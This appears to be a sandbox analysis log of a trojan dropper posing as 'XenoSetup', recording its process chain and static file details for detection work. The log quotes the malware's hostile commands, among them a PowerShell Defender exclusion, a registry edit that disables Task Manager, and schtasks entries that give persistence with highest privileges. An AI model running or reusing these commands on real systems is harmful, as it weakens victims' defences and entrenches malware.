Source: Aqnqislq.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: bGOWfMqu.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ItmQLqVf.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pczkrlLQ.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WKMEYgAB.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: lmJukoKX.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: TZhoQTpI.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: RPLnQAKH.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: IlCyhHua.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: remTNUPL.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZSKNtyuw.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: NZUxJEKO.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vMsrqipz.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ldZbGFkR.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UWIwmTED.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BFVQSOun.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ogLKbooN.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ARRIhAyp.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: LxMgmcSS.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BOtQCANk.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: jCRLjesV.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZTxvzCno.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ESyrPCdJ.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BcHAIFcQ.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: qodKYthi.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: NoWOUMSl.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vcvJAqxW.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PIQPERQj.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: xvoKkvvU.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: uOpJsBHp.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: NpzpwslB.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dQveIBvX.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UfDWuYEk.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: gQJUAkON.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: FSpHSmDL.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MPdHuBxA.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GpvhmufF.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: paukoYZl.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: frbUEvTD.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XOSeUCEW.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GGCzAPYH.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: eLGexRyL.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: LuUydMov.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: kEjDZxDz.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GyShWgyC.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: eDXMSiYF.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: XenoSetup(2).exe.bin.exe

Binary or memory string: OriginalFilenameXenoSetup(2).exe4 vs XenoSetup(2).exe.bin.exe

Source: XenoSetup(2).exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Source: DriverbrokerCrtDhcp.exe.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.01171875
Source: NZdXlPbVdUubKXQ.exe.15.dr	Static PE information: Section: .reloc ZLIB complexity 1.01171875

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@75/85@5/0

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_00FE6C74 GetLastError,FormatMessageW,

6_2_00FE6C74

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_00FFA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

6_2_00FFA6C2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XenoSetup(2).exe.bin.exe.log

Jump to behavior

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Mutant created: \Sessions\1\BaseNamedObjects\Z0cqwH6NGPmdGfDEN
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-SbjZ9dzDfzVchxMwaR3O
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:404:120:WilError_03

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Command line argument: sfxname	6_2_00FFDF1E
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Command line argument: sfxstime	6_2_00FFDF1E
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Command line argument: STARTDLG	6_2_00FFDF1E

Source: XenoSetup(2).exe.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: XenoSetup(2).exe.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: XenoSetup(2).exe.bin.exe

ReversingLabs: Detection: 55%

Source: Xeno.exe	String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: Xeno.exe	String found in binary or memory: Learn more: https://aka.ms/dotnet/app-launch-failed Would you like to download it now?
Source: Xeno.exe	String found in binary or memory: %s App: %s Architecture: %s App host version: %s .NET location: %s Learn more: https://aka.ms/dotnet/app-launch-failed Download
Source: Xeno.exe	String found in binary or memory: %sApp: %sArchitecture: %sApp host version: %s.NET location: %sLearn more:https://aka.ms/dotnet/app-launch-failedDownload
Source: Xeno.exe	String found in binary or memory: Learn more:https://aka.ms/dotnet/app-launch-failedWould you like to download it now?

Source: unknown	Process created: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe"
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Xeno.exe "C:\Users\user\AppData\Local\Temp\Xeno.exe"
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 8 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /f
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NZdXlPbVdUubKXQ" /sc ONLOGON /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 12 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP"
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP"
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP"
Source: unknown	Process created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 10 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /f
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DriverbrokerCrtDhcp" /sc ONLOGON /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 13 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Source: unknown	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Source: unknown	Process created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Xeno.exe "C:\Users\user\AppData\Local\Temp\Xeno.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"	Jump to behavior
